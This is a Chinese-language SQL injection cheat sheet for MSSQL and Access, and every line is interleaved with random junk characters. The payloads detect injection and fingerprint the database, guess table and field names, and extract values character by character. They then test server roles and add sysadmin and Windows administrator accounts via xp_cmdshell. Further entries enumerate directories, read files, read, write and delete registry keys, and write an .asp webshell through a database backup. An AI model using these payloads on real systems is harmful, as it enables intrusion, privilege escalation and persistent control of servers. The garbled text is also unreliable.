1.判断是否有注入;and 1=1 ;and 1=2 [% C,&h5
2.初步判断是否是mssql ;and user>0 3V<@Vkf5
|~r-VV(=
3.注入参数是字符'and [查询条件] and ''=' CJ*
D
_Z23lF9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 8LbwEKl
)\|+G5#`
5.判断数据库系统 ]QhTxrF"
W7^[W.
;and (select count(*) from sysobjects)>0 mssql Xx"<^FS[zC
[ n7>g
;and (select count(*) from msysobjects)>0 access x2rAB5r6
< cvh1~>(
0V4B Q:v
n:,mo} ?X
6.猜数据库 ;and (select Count(*) from [数据库名])>0 e"ehH#i
=5q<_as
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 d=/0A\O
@eJCr)#}
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 N7?B"p/
H5T_i$W
9.(1)猜字段的ascii值(access) `
y\)X
C7
hW~.F
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 8.i4QaU
83n%pS4x
(2)猜字段的ascii值(mssql) /]_ t->
<7M-?g:vj
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 y3zP`^
L5-|-PP|;
10.测试权限结构(mssql) MKl0 d
_!nsEG
VV
O$<>v\NC?
m1l6QcT1
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- +!/ATR%Uci
5o#JHD
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- '+`[)w
;V
xRaj?
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- BmG(+;;&
QO2cTk
m
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- vrkY7L3\
/ad9Q~nJ
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- rO'DT{Yt
5~L]zE
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- =]Vz=<
|A%9c.DG.
;and 1=(select IS_MEMBER('db_owner'));--
lN,?N{6s
<kak9
6A
FACw;/rW
Y@Uk P+{f=
11.添加mssql和系统的帐户 j3gDGw;
!+eH8
;exec master.dbo.sp_addlogin username;-- vADiW~^Q^
;exec master.dbo.sp_password null,username,password;-- #c^V%
`*C=R
_
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- +$h
[_,as
;exec master.dbo.xp_cmdshell 'net user username password *doNPp)m
[9 W@<p
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Smr{+m a
3v/B*M VI
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 2cR[~\_9.
zLpCKndj
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- K~N$s"Qx
hH %>
p+VU:%.t
.ZpOYhk
12.(1)遍历目录 EB~]6.1
?sf<cFF
;create table dirs(paths varchar(100), id int) 1E+12{~m"i
F (*B1J2_g
;insert dirs exec master.dbo.xp_dirtree 'c:\' gcJ!_KZK
$[ {5+ *
;and (select top 1 paths from dirs)>0 g7 \=
&Y{^yb
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) }LzBo\
M/zO|-j&
,_2-Op
Xz$4cI#n:
(2)遍历目录 {>]\<
p3I"LY
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 3JCo!n0
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 +yGQt3U
,T$ts
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 qJhsMo2IH
/*K2i5&X
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 #z\ub5um
;_o]$hV|
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ekM?
'9ez
YuX JT*
"-J5!y*,Y
4&/CES
13.mssql中的存储过程 JU 9GJ"
]Bhy=1
xp_regenumvalues 注册表根键, 子键 oBzl=N3<
{/'T:n#
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 #Y'eS'lv4
U!wi;W2
xp_regread 根键,子键,键值名 wP!X)p\
:|S zD4Ag
;exec xp_regread A#{63_H
K\Ea\b[
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 $l7^-SK`E
64s;EC
xp_regwrite 根键,子键, 值名, 值类型, 值 $[gN#QW%
(eHyas %X
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Vwkvu&4
iI3:<j
l
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 i+_LKHQN
q7R]!zk
xp_regdeletevalue 根键,子键,值名 gFDnt
]%Q!%uTh
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 k6G
_c;V
_plK(g-1J%
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 p>6`jr
bO '\QtW9
V%Uj\cv
,_[x|8m
14.mssql的backup创建webshell ><V*`{bD9)
WK~H]w
use model O%bbyR2
ajYe?z
create table cmd(str image); 9T,/R1N8
.tBlGMcN
insert into cmd(str) values (''); 0-.
d{P
r*X,]\V0x
backup database model to disk='c:\l.asp'; Z>[7#;;
2*#|t: (c
f5jl$H.
JF~i.+{h
15.mssql内置函数 u-_r2U
Bo 35L:r|
;and (select @@version)>0 获得Windows的版本号 %fS9F^AK
Oy6fl'FIt
;and user_name()='dbo' 判断当前系统的连接用户是不是sa n3^(y"q
ho]:)!|VY
;and (select user_name())>0 爆当前系统的连接用户 ui8 Q2{z
Y\|#Lu>B
;and (select db_name())>0 得到当前连接的数据库 &C 9hT
3h@]cWp
0[;2dc
X>q`F;W
16.简洁的webshell lu8G$EQI
]hl*6
use model ys_2?uv
. "Ms7=
create table cmd(str image); 1{}p_"s>
U&?hG>
insert into cmd(str) values (''); ^X#y'odtbS
RObnu*
backup database model to disk='g:\wwwtest\l.asp';